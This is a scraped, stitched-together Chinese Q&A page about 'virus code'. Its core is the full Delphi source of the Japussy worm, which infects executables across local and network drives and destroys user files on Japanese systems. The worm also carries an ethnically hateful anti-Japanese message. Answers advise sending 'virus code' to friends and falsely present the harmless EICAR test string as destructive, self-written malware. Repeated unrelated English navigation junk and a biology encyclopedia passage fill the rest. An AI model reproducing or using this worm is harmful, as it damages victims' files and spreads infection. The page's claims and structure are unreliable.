病毒代码复制,黑客病毒代码复制
病毒病毒代码
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
复制到记事本里,保存为文本文件
请问怎么把病毒代码转换成病毒文件? 我菜鸟。。请教一下大哥
先新建个文本文件夹,把代码复制进去,点文件,保存,就生成个TXT文件,再跟据你病毒类型修改格式。
求电脑病毒代码,
不行的 得用虚拟机才可以测试病毒代码 无需下载,把下面这段代码复制到记事本里,保存为文本文件
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
熊猫烧香
ogram Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记
//垃圾码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr '.') and
(SearchRec.Name '..') then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name '.') and
(SearchRec.Name '..') then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = '.ADC' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ':', '*.*'); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序上了,开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
end
能否~~~将病毒代码的使用方法仔细教我?(包括怎么去发别人)
首先创建一个文本文档,然后把以下的所有代码复制进去,然后保存,在右击这个文件,添加到压缩文件。再发给你的朋友就行了,如果杀毒软件够好,绝对可以测出病毒,但是如果一般的杀毒软件,那么就.....哼哼哼哼!!!!电脑的运行速度就会越来越慢,但慢到一定程度病毒就自动消失了,但需要1个月---2个月左右,所以病毒显然比较弱,如果对方察觉到电脑开始慢了,可能会换杀毒软件,这样病毒就会被消灭掉
以下是病毒代码
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
第二中方法:同样创建个文本文档,将以下代码复制进去,再保存,此病毒稍微比刚才的病毒代码强一点
以下是病毒代码(就几串字符就有破坏力了,牛吧?我编写的)
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
病毒是怎么样复制的?
概述
是一类个体微小,无完整细胞结构,含单一核酸(DNA或RNA)型,必须在活细胞内寄生并复制的非细胞型微生物。
原指一种动物来源的毒素。“virus”一词源于拉丁文。病毒能增殖、遗传和演化,因而具有生命最基本的特征。其主要特点是:①含有单一种核酸(DNA或RNA)的基因组和蛋白质外壳,没有细胞结构;②在感染细胞的同时或稍后释放其核酸,然后以核酸复制的方式增殖,而不是以二分裂方式增殖;③严格的细胞内寄生性。
病毒的形态
(1) 球状病毒;(2)杆状病毒;(3)砖形病毒;(4)有包膜的球状病毒;(5)具有球状头部的病毒;(6)封于包含体内的昆虫病毒。
病毒的大小
较大的病毒直径为300-450纳米,较小的病毒直径仅为18-22纳米
病毒的组成
病毒主要由核酸和蛋白质外壳组成。
病毒的复制过程叫做复制周期。其大致可分为连续的五个阶段:吸附、侵入、脱壳、病毒大分子的合成、病毒的装配与释放
结构
最简单的病毒中心是核酸,外面包被着1层有规律地排列的蛋白亚单位,称为衣壳。构成衣壳的形态亚单位称为壳粒,由核酸和衣壳蛋白所构成的粒子称为核壳。较复杂的病毒外边还有由脂质和糖蛋白构成包膜。核壳按壳粒的排列方式不同而分为3种模式:二十面体对称,如脊髓灰质炎病毒;螺旋对称,如烟草花叶病毒;复合对称,如 T偶数噬菌体。在脂质的包膜上还有1种或几种糖蛋白,在形态上形成突起,如流感病毒的血凝素和神经氨酸酶。昆虫病毒中有1类多角体病毒,其核壳被蛋白晶体所包被,形成多角形包涵体。
复 制
病毒复制指病毒粒入侵宿主细胞到最后细胞释放子代毒粒的全过程,包括吸附、进入与脱壳、病毒早期基因表达、核酸复制、晚期基因表达、装配和释放等步骤。各步的细节因病毒而异。
核酸复制
DNA病毒按照经典的沃森-克里克碱基配对方式进行 DNA复制。乳多泡病毒的环状 DNA按“滚环”模式进行复制时,需要有核酸内切酶和连接酶参与。病毒RNA是通过半保留方式复制的,即以病毒RNA(vRNA)为模板,同时转录几个互补链(cRNA),cRNA转录完成并脱落后,又以同样方式再转录出新的vRNA。因此,在感染细胞中可以查出具有部分双链结构而又拖着多条长短不同单链“尾巴”(正在合成中的互补链)的“复制中间体”。
病毒核酸复制所需酶的来源也各不相同。SV40DNA合成所需的酶都来自宿主。含RNA的Qβ噬菌体、小RNA病毒科和含ssRNA的植物病毒所需RNA多聚酶的某个亚基,可能由病毒基因编码,而其他亚基来自宿主。疱疹病毒DNA复制所需的酶,部分地由病毒编码,如DNA多聚酶和胸苷激酶,可能还有核苷酸还原酶。痘类病毒的独立自主能力最强,甚至能在去核细胞中进行DNA复制,其基因组至少能为75种蛋白质编码,包括DNA多聚酶、胸苷激酶、脱氧核糖核酸酶和聚核苷酸连接酶。
计算机病毒
计算机病毒不是我们所说的熟悉的生物病毒,计算机病毒是一个程序,一段可执行代码。但是,计算机病毒就像生物病毒一样,有独特的复制能力。同生物病毒一样计算机病毒可以很快地蔓延,而且常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。
除复制能力外,计算机病毒还有其它一些和生物病毒一样的共同特性:一个被病毒感染的程序能够传送病毒载体,如同传染病。当你看到病毒载体似乎仅仅表现在文字和图象上时,它们可能也已毁坏了文件、再格式化了你的硬盘,删除了驱动或造成了其它各种类型的灾害。若是病毒并不寄生于单独一个被感染的程序,它还能通过占据存储空间给你带来麻烦,并降低你的计算机的全部性能。和生物病毒在传播上的相似是“计算机病毒”名称的由来。